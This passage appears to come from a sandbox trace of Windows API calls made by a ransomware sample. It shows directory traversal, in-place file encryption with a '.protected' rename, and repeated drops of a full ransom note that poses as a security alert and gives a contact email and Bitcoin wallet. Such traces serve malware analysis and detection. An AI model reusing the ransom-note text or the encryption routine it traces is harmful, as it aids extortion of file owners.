lpOverlapped=0x0) returned 1 [0078.199] CloseHandle (hObject=0xd8) returned 1 [0078.199] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0078.199] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0078.200] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\RESTORE_FILES.txt") returned 70 [0078.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0078.200] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.200] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0078.201] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.201] WriteFile (in: hFile=0xd4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0078.201] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.201] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0078.201] CloseHandle (hObject=0xd4) returned 1 [0078.201] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="Windows") returned -1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="Program Files") returned -1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="Program Files (x86)") returned -1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="$Recycle.bin") returned 1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="System Volume Information") returned -1 [0078.201] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment") returned 58 [0078.201] lstrcmpW (lpString1="Deployment", lpString2=".") returned 1 [0078.201] lstrcmpW (lpString1="Deployment", lpString2="..") returned 1 [0078.202] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*") returned 60 [0078.202] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0078.202] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0078.202] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.202] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.202] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.202] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.202] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\.") returned 60 [0078.202] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.202] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.202] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.202] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.202] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.202] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.202] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.202] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\..") returned 61 [0078.202] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.202] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.202] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0078.202] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0078.202] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\RESTORE_FILES.txt") returned 76 [0078.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\deployment\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0078.203] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.203] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0078.203] lstrlenA (lpString="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") returned 
684 [0078.203] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0078.203] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.203] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0078.204] CloseHandle (hObject=0xd4) returned 1 [0078.204] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="Windows") returned -1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="Program Files") returned -1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="Program Files (x86)") returned -1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="$Recycle.bin") returned 1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="System Volume Information") returned -1 [0078.204] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 67 [0078.205] StrStrIW (lpFirst="GDIPFONTCACHEV1.DAT", lpSrch=".protected") returned 0x0 [0078.205] lstrcmpW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0078.205] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0078.205] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295eee4*=0x30) returned 1 [0078.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0078.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 67 [0078.205] StrStrW (lpFirst="GDIPFONTCACHEV1.DAT", lpSrch=".txt") returned 0x0 [0078.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 67 [0078.205] StrStrW (lpFirst="GDIPFONTCACHEV1.DAT", lpSrch=".rar") returned 0x0 [0078.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 67 [0078.205] StrStrW (lpFirst="GDIPFONTCACHEV1.DAT", lpSrch=".zip") returned 0x0 [0078.205] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0078.221] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.221] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0078.221] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.221] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) 
returned 1 [0078.222] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0078.222] CloseHandle (hObject=0xd4) returned 1 [0078.222] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.protected") returned 77 [0078.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.protected")) returned 1 [0078.223] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="Windows") returned -1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="Program Files") returned -1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="Program Files (x86)") returned -1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="$Recycle.bin") returned 1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="System Volume Information") returned -1 [0078.223] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google") returned 54 [0078.223] lstrcmpW (lpString1="Google", lpString2=".") returned 1 [0078.223] lstrcmpW (lpString1="Google", lpString2="..") returned 1 [0078.223] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*") returned 56 [0078.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0078.224] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.224] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.224] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.224] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.224] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\.") returned 56 [0078.224] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.224] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.224] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.224] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.224] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.224] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.224] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.224] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\..") returned 57 [0078.224] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.224] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.224] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.224] lstrcmpiW (lpString1="Chrome", lpString2="Windows") returned -1 [0078.224] lstrcmpiW (lpString1="Chrome", lpString2="Program Files") returned -1 [0078.224] lstrcmpiW (lpString1="Chrome", lpString2="Program Files (x86)") returned -1 [0078.224] lstrcmpiW (lpString1="Chrome", lpString2="$Recycle.bin") returned 1 
[0078.224] lstrcmpiW (lpString1="Chrome", lpString2="System Volume Information") returned -1 [0078.224] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 61 [0078.224] lstrcmpW (lpString1="Chrome", lpString2=".") returned 1 [0078.224] lstrcmpW (lpString1="Chrome", lpString2="..") returned 1 [0078.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*") returned 63 [0078.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0078.225] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.225] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.225] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.225] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.225] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\.") returned 63 [0078.225] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.225] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\..") returned 64 [0078.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.225] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="Windows") returned -1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="Program Files") returned 1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="Program Files (x86)") returned 1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="$Recycle.bin") returned 1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="System Volume Information") returned 1 [0078.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 71 [0078.225] lstrcmpW (lpString1="User Data", lpString2=".") returned 1 [0078.225] lstrcmpW (lpString1="User Data", lpString2="..") returned 1 [0078.226] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*") returned 73 [0078.226] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0078.238] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.238] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.238] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.238] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.238] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.238] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\.") returned 73 [0078.238] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.238] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.239] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.239] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.239] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.239] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.239] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.239] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\..") returned 74 [0078.239] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.239] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.239] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="Windows") returned -1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="Program Files") returned -1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="Program Files (x86)") returned -1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="$Recycle.bin") returned 1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="System Volume Information") returned -1 [0078.239] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 95 [0078.239] lstrcmpW (lpString1="CertificateTransparency", lpString2=".") returned 1 [0078.239] lstrcmpW (lpString1="CertificateTransparency", lpString2="..") 
returned 1 [0078.240] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*") returned 97 [0078.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.240] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.240] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.240] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.240] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.240] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.240] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\.") returned 97 [0078.240] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.240] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.241] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.241] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.241] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.241] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.241] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.241] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\..") returned 98 [0078.241] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.241] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.241] 
FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0078.241] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0078.241] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\RESTORE_FILES.txt") returned 113 [0078.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0078.241] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
